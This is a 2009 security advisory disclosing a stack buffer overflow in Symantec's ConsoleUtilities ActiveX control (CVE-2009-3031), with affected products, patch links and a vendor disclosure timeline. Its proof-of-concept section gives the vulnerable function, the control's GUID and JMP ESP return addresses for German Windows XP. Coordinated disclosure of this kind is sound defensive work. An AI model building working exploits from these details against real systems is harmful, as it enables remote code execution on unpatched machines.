_________________________________________ Security Advisory NSOADV-2009-001 _________________________________________ _________________________________________ Title: Symantec ConsoleUtilities ActiveX Control Buffer Overflow Severity: Critical Advisory ID: NSOADV-2009-001 Found Date: 09.09.2009 Date Reported: 15.09.2009 Release Date: 02.11.2009 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2009-001.txt Vendor: Symantec (http://www.symantec.com/) Affected Products: Symantec Altiris Notification Server 6.x Symantec Management Platform 7.0.x Symantec Altiris Deployment Solution 6.9.x Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846 Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000 Remote Exploitable: Yes Local Exploitable: No CVE-ID: CVE-2009-3031 Patch Status: Vendor released an patch Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== Altiris service-oriented management solutions provide a modular and future-proof approach to managing highly diverse and widely distributed IT infrastructures. They are open solutions that enable lifecycle integration of client, handheld, server, network and other IT assets with audit-ready security and automated operation. (Product description from Symantec Website) Description: ============ During the first access of the Management Website an ActiveX Control will be installed (AeXNSConsoleUtilities.dll), in which the function "BrowseAndSaveFile" is vulnerable to a stack based buffer overflow. Name: ConsoleUtilities Class Vendor: Altiris, Inc. Type: ActiveX-Steuerelement Version: 6.0.0.1846 GUID: {B44D252D-98FC-4D5C-948C-BE868392A004} File: AeXNSConsoleUtilities.dll Folder: C:\WINDOWS\system32 Proof of Concept : ================== NSOADV-2009-001

Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC

Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009

Some RET Infos:

Overwrite EIP with AAAA (crash)
EIP=String(2, unescape("%u4141"))

XP SP2 Ger shell32.dll JMP ESP
EIP=unescape("%uaf0a%u77d5")

XP SP3 Ger shell32.dll JMP ESP
EIP=unescape("%u30D7%u7E68")

----------------------------------------------------------------
DoS
Windows XP SP2 German
Windows XP SP3 German
Solution: ========= Symantec Security Advisory: http://tinyurl.com/y9fakve Hotfix (KB49568): Deployment Solution 6.9 SP3 https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568 Hotfix (KB49389): Notification Server 6.x Symantec Management Platform 7.x https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389 Disclosure Timeline (YYYY/MM/DD): ================================= 2009.09.09: Vulnerability found 2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.10.01) to Vendor 2009.09.15: Vendor response asking for resending the poc in a zipped and password protected file (AV problem) 2009.09.15: Resending zipped and password protected 2009.09.17: Symantec Security Response Team verifies the vulnerability 2009.09.22: Symantec product team verifies the finding 2009.09.29: Ask for a status update, because the planned release date is 2009.10.01. 2009.09.29: Symantec Security Response Team tries to get a time line from the product team. 2009.09.30: Changed release date to 2009.10.08 until a time line is known 2009.10.07: Ask for a status update, because the planned release date is 2009.10.08. 2009.10.07: Symantec Security Response Team informs me if all goes well they need one more week. 2009.10.07: Changed release date to 2009.10.15. 2009.10.14: Ask for a status update, because the planned release date is 2009.10.15. 2009.10.14: Symantec Security Response Team informs me that they have an issue with an update and they need one more week. 2009.10.14: Changed release date to 2009.10.22. 2009.10.21: Ask for a status update, because the planned release date is 2009.10.22. 2009.10.21: Symantec Security Response Team informs me that they have an issue with an update. 2009.10.21: Changed release date to 2009.10.29. 2009.10.28: Ask for a status update, because the planned release date is 2009.10.29. 2009.10.29: Symantec Security Response Team informs me that the patch will be released on 2009.11.02 at 9am PST. 2009.11.02: Symantec Security Response Team informs me that the patch and the Advisory is released. 2009.11.02: Release of this Advisory